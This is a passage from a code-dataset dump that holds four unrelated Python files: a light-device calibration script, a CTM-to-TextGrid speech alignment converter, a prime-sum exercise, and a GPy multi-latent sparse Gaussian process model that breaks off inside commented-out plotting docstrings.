Plot spds\n fig, ax = plt.subplots(figsize=(12, 4))\n device.plot_calibration_spds(ax=ax)\n ax.set_ylim(0, max_counts*1.05)\n fig.savefig(\n f'./{device.config[\"json_name\"]}_calibration_spds.svg')\n\n # Keep a log of which device / calibration was used to prepare the stims\n # and at what time\n with open(f'./{device.config[\"json_name\"]}_device_log.txt', 'w') as fh:\n pprint(S1.config, stream=fh)\n print(f'\\n> Time created: {datetime.now()}', file=fh)\n\n # Perform gamma correction\n device.do_gamma(fit='polynomial')\n device.gamma[device.gamma < MINTENSITY] = MINTENSITY\n device.gamma[device.gamma > MAXTENSITY] = MAXTENSITY\n device.gamma.to_csv(\n op.join(gamma_folder, f'./{device.config[\"json_name\"]}_gamma_table.csv'))\n device.plot_gamma(save_plots_to=gamma_folder, show_corrected=True)\n\n # Match backgrounds and pickle\n S1.background = pd.Series([.5] * S1.nprimaries)\n S2.background = S1.background * S1_S2_calibration_ratio\n\n # Pickle backgrounds so they can be loaded at start of experiment script\n with open('./STLAB_1_background.pkl', 'wb') as fh:\n pickle.dump(S1.w2s(S1.background), fh)\n with open('./STLAB_2_background.pkl', 'wb') as fh:\n pickle.dump(S2.w2s(S2.background), fh)\n \n # Save plot of the background spectra\n fig, ax = plt.subplots()\n s1_bg = S1.predict_multiprimary_spd(S1.background)\n s2_bg = S2.predict_multiprimary_spd(S2.background)\n ax.plot(s1_bg, label='STLAB_1 background')\n ax.plot(s2_bg, label='STLAB_2 background')\n ax.legend()\n ax.set_xlabel('Wavelength (nm)')\n ax.set_ylabel(S1.config['calibration_units'])\n ax.set_title('Background spectra')\n fig.savefig('./Background_spectra.svg')\n \nif __name__ == '__main__':\n main()\n","repo_name":"jtmbeta/MonBinSTLABMRI","sub_path":"calibration/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71361206563","text":"import asyncio\nimport os\nfrom praatio import audio, textgrid\nfrom typing import List\nfrom scipy.io import wavfile\n\nfrom src.utils.ctm_line import CtmLine\nfrom src.logger import logger\n\n\nclass CtmConverter:\n def __init__(\n self,\n use_ref: bool,\n base_name: str,\n ctm_path: str,\n audio_path: str,\n SEGMENT_DURATION_SEC: float = 15,\n MIN_SEGMENT_LENGTH_FACTOR: float = 0.5,\n MIN_SILENCE_SEC: float = 0.150,\n MIN_WORD_SEC: float = 0,\n ) -> None:\n\n # Check inputs.\n assert os.path.exists(ctm_path), \"ctm_path '%s' does not exist.\" % ctm_path\n assert os.path.exists(audio_path), (\n \"audio_path '%s' does not exist.\" % audio_path\n )\n assert (\n SEGMENT_DURATION_SEC > 0\n ), \"SEGMENT_DURATION_SEC must be a positive float.\"\n assert (\n MIN_SEGMENT_LENGTH_FACTOR > 0 and MIN_SEGMENT_LENGTH_FACTOR <= 1\n ), \"MIN_SEGMENT_LENGTH_FACTOR must be a float in (0,1].\"\n assert MIN_SILENCE_SEC >= 0, \"MIN_SILENCE_SEC must be a float in [0,+inf)\"\n assert MIN_WORD_SEC >= 0, \"MIN_WORD_SEC must be a float in [0,+inf)\"\n\n # Save inputs for debugging.\n self.base_name = base_name\n self.ctm_path = ctm_path\n self.audio_path = audio_path\n self.SEGMENT_DURATION_SEC = SEGMENT_DURATION_SEC\n self.MIN_SEGMENT_LENGTH_FACTOR = MIN_SEGMENT_LENGTH_FACTOR\n self.MIN_SILENCE_SEC = MIN_SILENCE_SEC\n self.MIN_WORD_SEC = MIN_WORD_SEC\n\n # Parse lines.\n with open(ctm_path, encoding=\"utf-8\", mode=\"r\") as f:\n ctm_lines = [CtmLine(use_ref, line=line) for line in f]\n\n # Append silences.\n eps = 1e-5\n i = 0\n while i < len(ctm_lines) - 1:\n # Insert silence?\n if ctm_lines[i + 1].start > ctm_lines[i].end + eps:\n ctm_lines.insert(\n i + 1,\n CtmLine(\n use_ref,\n utt_id=ctm_lines[i].utt_id,\n channel=ctm_lines[i].channel,\n start=ctm_lines[i].end,\n end=ctm_lines[i + 1].start,\n word=\"\",\n score=1.0,\n ),\n )\n continue\n\n # Remove overlap?\n if ctm_lines[i + 1].start < ctm_lines[i].end - eps:\n if ctm_lines[i + 1].score <= ctm_lines[i].score:\n # Move next line's start bound.\n ctm_lines[i + 1].start = ctm_lines[i].end\n else:\n # Move this line's end bound.\n ctm_lines[i].end = ctm_lines[i + 1].start\n\n # Remove segments that are too short.\n if ctm_lines[i].word == \"\":\n min_len = self.MIN_SILENCE_SEC\n else:\n min_len = self.MIN_WORD_SEC\n if ctm_lines[i].end - ctm_lines[i].start < min_len + eps:\n # Short silences are divied over neighboring words.\n if ctm_lines[i].word == \"\":\n duration = ctm_lines[i].end - ctm_lines[i].start\n if i > 0:\n ctm_lines[i - 1].end += duration / 2\n ctm_lines[i + 1].start -= duration / 2\n else:\n ctm_lines[i + 1].start -= duration\n ctm_lines.remove(ctm_lines[i])\n continue\n\n i += 1\n\n # Heuristic punctuation based on silences.\n silences = []\n for line in ctm_lines:\n if line.word == \"\":\n silences.append(line.end - line.start)\n\n # Punctuation threshold = longest xx% of silences\n PUNC_THRESHOLD = 0.40\n silences_sort = sorted(silences)\n idx = int(PUNC_THRESHOLD * len(silences_sort))\n PUNC_SILENCE_DURATION = silences_sort[idx]\n\n # Likely sentence starts for punctuation.\n likely_starts = [\n *(\"ik\", \"jij\", \"je\", \"hij\", \"zij\", \"ze\", \"u\", \"jullie\"),\n *(\"de\", \"het\", \"dit\", \"dat\"),\n *(\"en\", \"maar\", \"dus\", \"dan\", \"toen\"),\n ]\n\n # Insert punctuation.\n last_punctuation = -1\n i = 0\n while i < len(ctm_lines):\n\n # Don't allow short sentences (minimum 3 words)\n # \". A B .\"\n # 0* 1 2 3*\n if i - last_punctuation <= 3:\n i += 1\n continue\n\n line = ctm_lines[i]\n line_duration = line.end - line.start\n if line.word == \"\" and line_duration > PUNC_SILENCE_DURATION:\n\n # Search for likely sentence starts.\n j = i + 1\n while j < len(ctm_lines):\n line_j = ctm_lines[j]\n if not line_j.is_filler and line_j.word != \"\":\n if line_j.word in likely_starts:\n line.word = \".\"\n i = j\n last_punctuation = j\n break\n j += 1\n\n # Final word ends with period.\n if i == len(ctm_lines) - 1:\n line.word = \".\"\n\n i += 1\n\n self.data = {\n \"audio_path\": audio_path,\n \"ctm_lines\": ctm_lines,\n \"utterance\": self._lines_to_utterance(ctm_lines),\n }\n\n def _interval_to_str(self, start: float, end: float, value: str):\n return \"(start=%0.4f,end=%0.4f,value=%s)\" % (start, end, value)\n\n def _fix_rounding_errors(self, entries, minT, maxT):\n new_entries = []\n last_start = None\n last_end = None\n last_value = None\n for start, end, value in entries:\n\n # Make copies, so we can still log the original variables.\n new_start = start\n new_end = end\n\n # Check valid start/end times. Print error message if error is too large.\n eps = 1e-3\n if new_start < minT:\n if minT - new_start > eps:\n msg = \"Problem with interval %s: start time is smaller than minT (%0.4f).\"\n msg %= (self._interval_to_str(start, end, value), minT)\n logger.error(msg)\n new_start = minT\n if new_end > maxT:\n if new_end - maxT > eps:\n msg = \"Problem with interval %s: end time is larger than maxT (%0.4f).\"\n msg %= (self._interval_to_str(start, end, value), maxT)\n logger.error(msg)\n new_end = maxT\n\n # Also check if this start time is not before the previous end time.\n if last_end is not None and new_start < last_end:\n if last_end - new_start > eps:\n msg = \"Problem with consecutive intervals %s, %s: start time is smaller than previous end time.\"\n msg %= (\n self._interval_to_str(last_start, last_end, last_value),\n self._interval_to_str(start, end, value),\n )\n logger.error(msg)\n new_start = last_end\n\n # Make sure the interval is not zero-length!\n if new_start > new_end - eps:\n msg = \"Problem with interval %s: interval duration collapses to 0 seconds.\"\n msg += \"Calculation used 'corrected interval' %s.\"\n msg += \"Removing interval...\"\n msg %= (\n self._interval_to_str(start, end, value),\n self._interval_to_str(new_start, new_end, value),\n )\n logger.error(msg)\n continue\n\n # Add the interval to the new entry list.\n new_entries.append((new_start, new_end, value))\n\n # Remember last interval.\n last_start, last_end, last_value = start, end, value\n\n return new_entries\n\n def _calculate_segment_end(\n self,\n segment_start: float,\n audio_duration: float,\n ):\n nominal_end = segment_start + self.SEGMENT_DURATION_SEC\n nearest_end = self._get_nearest_bound(nominal_end, \"end\")\n offset = abs(nearest_end - nominal_end)\n max_offset = self.SEGMENT_DURATION_SEC * self.MIN_SEGMENT_LENGTH_FACTOR\n if offset > max_offset:\n segment_end = nominal_end\n else:\n segment_end = nearest_end\n\n # Make sure final segment is long enough.\n rest = audio_duration - segment_end\n if rest < max_offset:\n segment_end = audio_duration\n\n return segment_end\n\n def _get_nearest_bound(self, time: float, bound: str):\n # bound must be either \"start\" or \"end\"\n if bound not in {\"start\", \"end\"}:\n raise Exception(\"bound must be 'start' or 'end'.\")\n\n ctm_lines: List[CtmLine] = self.data[\"ctm_lines\"]\n min_dist = None\n best_line = None\n for line in ctm_lines:\n\n # Calculate error. Positive error means the line is after the desired\n # time.\n if bound == \"start\":\n err = line.start - time\n if bound == \"end\":\n err = line.end - time\n\n cur_dist = abs(err)\n # Assuming lines are chronologically ordered, define exit clause.\n if min_dist is not None and err > 0 and cur_dist > min_dist:\n break\n # Save minimum distance?\n if min_dist is None or cur_dist < min_dist:\n min_dist = cur_dist\n best_line = line\n\n # Return best value.\n if best_line is None:\n return None\n elif bound == \"start\":\n return best_line.start\n elif bound == \"end\":\n return best_line.end\n\n def _filter_lines(\n self, lines: List[CtmLine], start_time: float = None, end_time: float = None\n ):\n eps = 1e-3\n filtered = False\n # Filter words occurring after `start_time`.\n if start_time is not None:\n lines = filter(lambda x: x.start > start_time - eps, lines)\n filtered = True\n # Filter words occurring before `end_time`.\n if end_time is not None:\n lines = filter(lambda x: x.end < end_time + eps, lines)\n filtered = True\n\n if filtered:\n return list(lines)\n else:\n return lines\n\n def _lines_to_utterance(\n self, lines: List[CtmLine], start_time: float = None, end_time: float = None\n ):\n # Works best if start_time/end_time are at a word boundary!\n\n # Filter lines based on desired start/end times.\n lines = self._filter_lines(lines, start_time, end_time)\n\n # Filter out silences.\n lines = filter(lambda x: x.word != \"\", lines)\n\n # Return utterance.\n return \" \".join(x.word for x in lines)\n\n async def write_textgrids_async(\n self,\n textgrids_dir: str,\n audio_segments_dir: str,\n context_secs: float = 0,\n sleep_secs: float = 0.1,\n ):\n # Create output directories.\n if not os.path.exists(textgrids_dir):\n os.makedirs(textgrids_dir)\n if not os.path.exists(audio_segments_dir):\n os.makedirs(audio_segments_dir)\n\n audio_path: str = self.data[\"audio_path\"]\n ctm_lines: List[CtmLine] = self.data[\"ctm_lines\"]\n\n # Calculate audio duration and number of segments.\n audio_duration = audio.getDuration(audio_path)\n\n # Load audio file.\n fs, audio_data = wavfile.read(audio_path)\n\n # Process per segment.\n segment_idx = 0\n segment_start = 0\n segment_end = self._calculate_segment_end(\n segment_start,\n audio_duration,\n )\n eps = 1e-3\n while segment_start + eps < audio_duration:\n\n # Give other threads a chance to run.\n await asyncio.sleep(sleep_secs)\n\n # Calculate start/end context duration. This will add X seconds to\n # start/end of audio in order to provide a bit of context. Of course,\n # this is not possible at the start/end of the file.\n start_context = min(segment_start, context_secs)\n end_context = min(audio_duration - segment_end, context_secs)\n\n # Calculate lines.\n filtered_lines = self._filter_lines(\n ctm_lines,\n start_time=segment_start,\n end_time=segment_end,\n )\n\n # Calculate utterance.\n segment_utterance = self._lines_to_utterance(filtered_lines)\n\n # ==================== #\n # CREATE AUDIO SEGMENT #\n # ==================== #\n\n # Make sure we include the context audio!\n audio_start = max(int((segment_start - start_context) * fs), 0)\n audio_end = min(int((segment_end + end_context) * fs), len(audio_data))\n audio_segment_data = audio_data[audio_start:audio_end]\n audio_segment_path = os.path.join(\n audio_segments_dir,\n \"%s_%03i.wav\" % (self.base_name, segment_idx),\n )\n wavfile.write(audio_segment_path, fs, audio_segment_data)\n\n # =============== #\n # CREATE TEXTGRID #\n # =============== #\n tg = textgrid.Textgrid()\n\n minT = 0\n maxT = segment_end - segment_start + start_context + end_context\n\n # Construct entries for each tier.\n utt_entries = [\n (minT + start_context, maxT - end_context, segment_utterance)\n ]\n word_entries = [\n x.word_entry(offset=-segment_start + start_context)\n for x in filtered_lines\n ]\n score_entries = [\n x.score_entry(offset=-segment_start + start_context)\n for x in filtered_lines\n ]\n\n # Add an entry for each context area in the 3 tiers.\n if start_context > 0:\n entry_times = (minT, start_context)\n # Utt tier.\n entry = (*entry_times, \"Start context: do not annotate this part!\")\n utt_entries.insert(0, entry)\n # Word tier.\n entry = (*entry_times, \"/CONTEXT/\")\n word_entries.insert(0, entry)\n # Score tier.\n entry = (*entry_times, \"/\")\n score_entries.insert(0, entry)\n if end_context > 0:\n entry_times = (maxT - end_context, maxT)\n # Utt tier.\n entry = (*entry_times, \"End context: do not annotate this part!\")\n utt_entries.append(entry)\n # Word tier.\n entry = (*entry_times, \"/CONTEXT/\")\n word_entries.append(entry)\n # Score tier.\n entry = (*entry_times, \"/\")\n score_entries.append(entry)\n\n # Fix any rounding errors.\n utt_entries = self._fix_rounding_errors(utt_entries, minT, maxT)\n word_entries = self._fix_rounding_errors(word_entries, minT, maxT)\n score_entries = self._fix_rounding_errors(score_entries, minT, maxT)\n\n # Create the Tiers.\n utt_tier = textgrid.IntervalTier(\n name=\"utterance\",\n entryList=utt_entries,\n minT=minT,\n maxT=maxT,\n )\n word_tier = textgrid.IntervalTier(\n name=\"words\",\n entryList=word_entries,\n minT=minT,\n maxT=maxT,\n )\n score_tier = textgrid.IntervalTier(\n name=\"scores\",\n entryList=score_entries,\n minT=minT,\n maxT=maxT,\n )\n\n # Add the tiers.\n tg.addTier(utt_tier)\n tg.addTier(word_tier)\n tg.addTier(score_tier)\n\n # Write the file.\n textgrid_segment_path = os.path.join(\n textgrids_dir,\n \"%s_%03i.TextGrid\" % (self.base_name, segment_idx),\n )\n tg.save(\n textgrid_segment_path,\n format=\"short_textgrid\",\n includeBlankSpaces=False,\n )\n\n # Next segment.\n segment_idx += 1\n segment_start = segment_end\n segment_end = self._calculate_segment_end(\n segment_start,\n audio_duration,\n )\n","repo_name":"btamm12/fpack_webapp_client","sub_path":"src/utils/ctm_converter.py","file_name":"ctm_converter.py","file_ext":"py","file_size_in_byte":16690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16783524713","text":"M = int(input())\nN = int(input())\n\nprime = [True]*(N+1)\nprime[0] = False\nprime[1] = False\n\nfor i in range(2, int(N**(1/2))+1):\n for j in range(2, int(N/2)+1):\n if i*j > N:\n break\n\n prime[i*j] = False\n\ntotal = 0\nfor i in range(M, N+1):\n if prime[i]:\n if total == 0:\n min_prime = i\n total = total + i\n\nif total == 0:\n print(-1)\n\nelse:\n print(total)\n print(min_prime)\n","repo_name":"yyytae0/algorithm-training","sub_path":"baekjoon/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3751884213","text":"import numpy as np\nfrom GPy.util import choleskies\nfrom GPy.core.model import Model\nfrom GPy.core.parameterization.param import Param\nfrom svgp_multi_inf import SVGPMultiInf as svgp_inf\nfrom GPy.util.linalg import mdot\nfrom GPy.core.parameterization.variational import VariationalPosterior, NormalPosterior\nfrom GPy.core.parameterization import ObsAr\nimport GPy\nimport sys\nfrom GPy.plotting.matplot_dep.util import fixed_inputs\nimport matplotlib.pyplot as plt\n\nclass SVGPMulti(GPy.core.SparseGP):\n def __init__(self, X, Y, Z, kern_list, likelihood, mean_functions=None, name='SVGPMulti', Y_metadata=None, batchsize=None):\n \"\"\"\n Extension to the SVGP to allow multiple latent function,\n where the latent functions are assumed independant (have one kernel per latent function)\n \"\"\"\n # super(SVGPMulti, self).__init__(name) # Parameterized.__init__(self)\n\n assert X.ndim == 2\n self.Y_metadata = Y_metadata\n _, self.output_dim = Y.shape\n\n # self.Z = Param('inducing inputs', Z)\n # self.num_inducing = Z.shape[0]\n # self.likelihood = likelihood\n\n self.kern_list = kern_list\n self.batchsize = batchsize\n\n #Batch the data\n self.X_all, self.Y_all = X, Y\n if batchsize is None:\n X_batch, Y_batch = X, Y\n else:\n import climin.util\n #Make a climin slicer to make drawing minibatches much quicker\n self.slicer = climin.util.draw_mini_slices(self.X_all.shape[0], self.batchsize)\n X_batch, Y_batch = self.new_batch()\n\n # if isinstance(X_batch, (ObsAr, VariationalPosterior)):\n # self.X = X_batch.copy()\n # else:\n # self.X = ObsAr(X_batch)\n # self.Y = Y_batch\n\n #create the SVI inference method\n # self.inference_method = svgp_inf()\n inference_method = svgp_inf()\n\n #Initialize base model\n super(SVGPMulti, self).__init__(X=X_batch, Y=Y_batch, Z=Z, kernel=kern_list[0], likelihood=likelihood, mean_function=None, X_variance=None, inference_method=inference_method, name=name, Y_metadata=Y_metadata, normalizer=False)\n self.unlink_parameter(self.kern) # We don't want a single kern\n\n # self.num_data, self.input_dim = self.X.shape\n self.num_outputs = self.Y.shape[1]\n\n self.num_latent_funcs = self.likelihood.request_num_latent_functions(self.Y_all)\n\n #Make a latent function per dimension\n self.q_u_means = Param('q_u_means', np.zeros((self.num_inducing, self.num_latent_funcs)))\n chols = choleskies.triang_to_flat(np.tile(np.eye(self.num_inducing)[None,:,:], (self.num_latent_funcs,1,1)))\n self.q_u_chols = Param('qf_u_chols', chols)\n\n self.link_parameter(self.Z, index=0)\n self.link_parameter(self.q_u_means)\n self.link_parameter(self.q_u_chols)\n # self.link_parameter(self.likelihood)\n\n #Must pass a list of kernels that work on each latent function for now\n assert len(kern_list) == self.num_latent_funcs\n #Add the rest of the kernels, one kernel per latent function\n [self.link_parameter(kern) for kern in kern_list]\n #self.latent_f_list = [self.mf, self.mg]\n #self.latent_fchol_list = [self.cholf, self.cholg]\n\n if mean_functions is None:\n self.mean_functions = [None]*self.num_latent_funcs\n elif len(mean_functions) != len(kern_list):\n raise ValueError(\"Must provide a mean function for all latent\\n\\\n functions as a list, provide None if no latent\\n\\\n function is needed for a specific latent function\")\n else:\n self.mean_functions = []\n for m_f in mean_functions:\n if m_f is not None:\n self.link_parameter(m_f)\n self.mean_functions.append(m_f)\n\n\n def log_likelihood(self):\n return self._log_marginal_likelihood\n\n def parameters_changed(self):\n self.batch_scale = float(self.X_all.shape[0])/float(self.X.shape[0])\n self.posteriors, self._log_marginal_likelihood, grad_dict = self.inference_method.inference(self.q_u_means, self.q_u_chols, self.kern_list, self.X, self.Z, self.likelihood,\n self.Y, self.mean_functions, self.Y_metadata, KL_scale=1.0, batch_scale=self.batch_scale)\n self.likelihood.update_gradients(grad_dict['dL_dthetaL'])\n #update the kernel gradients\n #Shared Z\n Z_grad = np.zeros_like(self.Z.values)\n for latent_f_ind, kern in enumerate(self.kern_list):\n kern.update_gradients_full(grad_dict['dL_dKmm'][latent_f_ind], self.Z)\n grad = kern.gradient.copy()\n kern.update_gradients_full(grad_dict['dL_dKmn'][latent_f_ind], self.Z, self.X)\n grad += kern.gradient.copy()\n kern.update_gradients_diag(grad_dict['dL_dKdiag'][latent_f_ind], self.X)\n kern.gradient += grad\n if not self.Z.is_fixed:# only compute these expensive gradients if we need them\n Z_grad += kern.gradients_X(grad_dict['dL_dKmm'][latent_f_ind], self.Z)\n Z_grad += kern.gradients_X(grad_dict['dL_dKmn'][latent_f_ind], self.Z, self.X)\n\n #update the variational parameter gradients:\n self.q_u_means[:, latent_f_ind*self.num_outputs:(latent_f_ind+1)*self.num_outputs].gradient = grad_dict['dL_dm'][latent_f_ind]\n self.q_u_chols[:, latent_f_ind*self.num_outputs:(latent_f_ind+1)*self.num_outputs].gradient = grad_dict['dL_dchol'][latent_f_ind]\n\n mean_function = self.mean_functions[latent_f_ind]\n if mean_function is not None:\n mean_function.update_gradients(grad_dict['dL_dmfX'][latent_f_ind], self.X)\n g = mean_function.gradient[:].copy()\n mean_function.update_gradients(grad_dict['dL_dmfZ'][latent_f_ind], self.Z)\n mean_function.gradient[:] += g\n Z_grad += mean_function.gradients_X(grad_dict['dL_dmfZ'][latent_f_ind], self.Z)\n\n if not self.Z.is_fixed:# only compute these expensive gradients if we need them\n self.Z.gradient[:] = Z_grad\n\n def set_data(self, X, Y):\n \"\"\"\n Set the data without calling parameters_changed to avoid wasted computation\n If this is called by the stochastic_grad function this will immediately update the gradients\n \"\"\"\n assert X.shape[1]==self.Z.shape[1]\n self.X, self.Y = X, Y\n\n def new_batch(self):\n \"\"\"\n Return a new batch of X and Y by taking a chunk of data from the complete X and Y\n \"\"\"\n i = self.slicer.next()\n return self.X_all[i], self.Y_all[i]\n\n def stochastic_grad(self, parameters):\n self.set_data(*self.new_batch())\n return self._grads(parameters)\n\n def optimizeWithFreezingZ(self):\n self.Z.fix()\n self.kern.fix()\n self.optimize('bfgs')\n self.Z.unfix()\n self.kern.constrain_positive()\n self.optimize('bfgs')\n\n def log_predictive_density(self, x_test, y_test, Y_metadata=None):\n mf, vf = self._raw_predict(x_test, 0)\n mg, vg = self._raw_predict(x_test, 1)\n mu_stars = [mf, mg]\n var_stars = [vf, vg]\n return self.likelihood.log_predictive_density(y_test, mu_stars, var_stars, Y_metadata)\n\n def log_predictive_density_sampling(self, x_test, y_test, Y_metadata=None, num_samples=1000):\n mf, vf = self._raw_predict(x_test, 0)\n mg, vg = self._raw_predict(x_test, 1)\n mu_stars = np.hstack((mf, mg))\n var_stars = np.hstack((vf, vg))\n return self.likelihood.log_predictive_density_sampling(y_test, mu_stars, var_stars, Y_metadata, num_samples=num_samples)\n\n def _raw_predict(self, Xnew, latent_function_ind=None, full_cov=False, kern=None):\n \"\"\"\n Make a prediction for the latent function values.\n\n For certain inputs we give back a full_cov of shape NxN,\n if there is missing data, each dimension has its own full_cov of shape NxNxD, and if full_cov is of,\n we take only the diagonal elements across N.\n\n For uncertain inputs, the SparseGP bound produces a full covariance structure across D, so for full_cov we\n return a NxDxD matrix and in the not full_cov case, we return the diagonal elements across D (NxD).\n This is for both with and without missing data. See for missing data SparseGP implementation py:class:'~GPy.models.sparse_gp_minibatch.SparseGPMiniBatch'.\n \"\"\"\n #Plot f by default\n if latent_function_ind is None:\n latent_function_ind = 0\n\n if kern is None:\n kern = self.kern_list[latent_function_ind]\n\n posterior = self.posteriors[latent_function_ind]\n\n Kx = kern.K(self.Z, Xnew)\n mu = np.dot(Kx.T, posterior.woodbury_vector)\n if full_cov:\n Kxx = kern.K(Xnew)\n if posterior.woodbury_inv.ndim == 2:\n var = Kxx - np.dot(Kx.T, np.dot(posterior.woodbury_inv, Kx))\n elif posterior.woodbury_inv.ndim == 3:\n var = Kxx[:,:,None] - np.tensordot(np.dot(np.atleast_3d(posterior.woodbury_inv).T, Kx).T, Kx, [1,0]).swapaxes(1,2)\n var = var\n else:\n Kxx = kern.Kdiag(Xnew)\n var = (Kxx - np.sum(np.dot(np.atleast_3d(posterior.woodbury_inv).T, Kx) * Kx[None,:,:], 1)).T\n #add in the mean function\n if self.mean_functions[latent_function_ind] is not None:\n mu += self.mean_functions[latent_function_ind].f(Xnew)\n\n return mu, var\n\n def plot_fs(self, dim=0, variances=False, median=True, true_variance=True):\n \"\"\"\n Plotting for models with two latent functions, one is an exponent over the scale\n parameter\n \"\"\"\n assert self.likelihood.request_num_latent_functions(self.Y) == 2\n if median:\n XX = fixed_inputs(self, non_fixed_inputs=[dim], fix_routine='median', as_list=False)\n else:\n XX = np.linspace(self.X[:, dim].min(), self.X[:, dim].max(), 200)[:, None]\n X_pred_points = XX.copy()\n X_pred_points_lin = np.linspace(self.X[:, dim].min(), self.X[:, dim].max(), self.X.shape[0])\n X_pred_points[:, dim] = X_pred_points_lin\n\n mf, vf = self._raw_predict(X_pred_points, 0)\n mg, vg = self._raw_predict(X_pred_points, 1)\n\n f_std = np.sqrt(vf)\n mf_lower = mf - 2*f_std\n mf_upper = mf + 2*f_std\n\n if true_variance:\n #Real likelihood variance\n g_std = np.sqrt(self.likelihood.conditional_variance(mg))\n g_std_err_f = 2*np.sqrt(np.exp(vg)) # Standard error in f space\n vg_std = np.sqrt(self.likelihood.conditional_variance(g_std_err_f)) # std error in likelihood space\n else:\n #Squared scale parameter\n g_std = np.sqrt(np.exp(mg))\n vg_std = np.sqrt(vg)\n\n mg_loc_upper = mf + 2*g_std\n mg_loc_lower = mf - 2*g_std\n\n fig, ax = plt.subplots()\n X_dim = X_pred_points[:,dim:dim+1]\n ax.plot(X_dim, mf, 'b-')\n ax.plot(X_dim, mg_loc_upper, 'g-')\n ax.plot(X_dim, mg_loc_lower, 'm-')\n ax.plot(XX, self.Y, 'kx')\n\n if variances:\n ax.plot(X_dim, mf_upper, 'b--', alpha=0.5)\n ax.plot(X_dim, mf_lower, 'b--', alpha=0.5)\n\n gf_upper_upper = mg_loc_upper + 2*vg_std\n gf_upper_lower = mg_loc_upper - 2*vg_std\n\n gf_lower_upper = mg_loc_lower + 2*vg_std\n gf_lower_lower = mg_loc_lower - 2*vg_std\n\n #Variance around upper standard erro\n ax.plot(X_dim, gf_upper_upper, 'g--', alpha=0.5)\n ax.plot(X_dim, gf_upper_lower, 'g--', alpha=0.5)\n\n #Variance around lower standard error\n ax.plot(X_dim, gf_lower_upper, 'm--', alpha=0.5)\n ax.plot(X_dim, gf_lower_lower, 'm--', alpha=0.5)\n\n # def plot_f(self, plot_limits=None, which_data_rows='all',\n # which_data_ycols='all', fixed_inputs=[],\n # levels=20, samples=0, fignum=None, ax=None, resolution=None,\n # plot_raw=True,\n # linecol=None,fillcol=None, Y_metadata=None, data_symbol='kx',\n # apply_link=False):\n # \"\"\"\n # Plot the GP's view of the world, where the data is normalized and before applying a likelihood.\n # This is a call to plot with plot_raw=True.\n # Data will not be plotted in this, as the GP's view of the world\n # may live in another space, or units then the data.\n\n # Can plot only part of the data and part of the posterior functions\n # using which_data_rowsm which_data_ycols.\n\n # :param plot_limits: The limits of the plot. If 1D [xmin,xmax], if 2D [[xmin,ymin],[xmax,ymax]]. Defaluts to data limits\n # :type plot_limits: np.array\n # :param which_data_rows: which of the training data to plot (default all)\n # :type which_data_rows: 'all' or a slice object to slice model.X, model.Y\n # :param which_data_ycols: when the data has several columns (independant outputs), only plot these\n # :type which_data_ycols: 'all' or a list of integers\n # :param fixed_inputs: a list of tuple [(i,v), (i,v)...], specifying that input index i should be set to value v.\n # :type fixed_inputs: a list of tuples\n # :param resolution: the number of intervals to sample the GP on. Defaults to 200 in 1D and 50 (a 50x50 grid) in 2D\n # :type resolution: int\n # :param levels: number of levels to plot in a contour plot.\n # :param levels: for 2D plotting, the number of contour levels to use is ax is None, create a new figure\n # :type levels: int\n # :param samples: the number of a posteriori samples to plot\n # :type samples: int\n # :param fignum: figure to plot on.\n # :type fignum: figure number\n # :param ax: axes to plot on.\n # :type ax: axes handle\n # :param linecol: color of line to plot [Tango.colorsHex['darkBlue']]\n # :type linecol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param fillcol: color of fill [Tango.colorsHex['lightBlue']]\n # :type fillcol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param Y_metadata: additional data associated with Y which may be needed\n # :type Y_metadata: dict\n # :param data_symbol: symbol as used matplotlib, by default this is a black cross ('kx')\n # :type data_symbol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) alongside marker type, as is standard in matplotlib.\n # :param apply_link: if there is a link function of the likelihood, plot the link(f*) rather than f*\n # :type apply_link: boolean\n # \"\"\"\n # assert \"matplotlib\" in sys.modules, \"matplotlib package has not been imported.\"\n # from GPy.plotting.matplot_dep import models_plots\n # kw = {}\n # if linecol is not None:\n # kw['linecol'] = linecol\n # if fillcol is not None:\n # kw['fillcol'] = fillcol\n # return models_plots.plot_fit(self, plot_limits, which_data_rows,\n # which_data_ycols, fixed_inputs,\n # levels, samples, fignum, ax, resolution,\n # plot_raw=plot_raw, Y_metadata=Y_metadata,\n # data_symbol=data_symbol, apply_link=apply_link, **kw)\n\n # def plot(self, plot_limits=None, which_data_rows='all',\n # which_data_ycols='all', fixed_inputs=[],\n # levels=20, samples=0, fignum=None, ax=None, resolution=None,\n # plot_raw=False,\n # linecol=None,fillcol=None, Y_metadata=None, data_symbol='kx'):\n # \"\"\"\n # Plot the posterior of the GP.\n # - In one dimension, the function is plotted with a shaded region identifying two standard deviations.\n # - In two dimsensions, a contour-plot shows the mean predicted function\n # - In higher dimensions, use fixed_inputs to plot the GP with some of the inputs fixed.\n\n # Can plot only part of the data and part of the posterior functions\n # using which_data_rowsm which_data_ycols.\n\n # :param plot_limits: The limits of the plot. If 1D [xmin,xmax], if 2D [[xmin,ymin],[xmax,ymax]]. Defaluts to data limits\n # :type plot_limits: np.array\n # :param which_data_rows: which of the training data to plot (default all)\n # :type which_data_rows: 'all' or a slice object to slice model.X, model.Y\n # :param which_data_ycols: when the data has several columns (independant outputs), only plot these\n # :type which_data_ycols: 'all' or a list of integers\n # :param fixed_inputs: a list of tuple [(i,v), (i,v)...], specifying that input index i should be set to value v.\n # :type fixed_inputs: a list of tuples\n # :param resolution: the number of intervals to sample the GP on. Defaults to 200 in 1D and 50 (a 50x50 grid) in 2D\n # :type resolution: int\n # :param levels: number of levels to plot in a contour plot.\n # :param levels: for 2D plotting, the number of contour levels to use is ax is None, create a new figure\n # :type levels: int\n # :param samples: the number of a posteriori samples to plot\n # :type samples: int\n # :param fignum: figure to plot on.\n # :type fignum: figure number\n # :param ax: axes to plot on.\n # :type ax: axes handle\n # :param linecol: color of line to plot [Tango.colorsHex['darkBlue']]\n # :type linecol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param fillcol: color of fill [Tango.colorsHex['lightBlue']]\n # :type fillcol: color 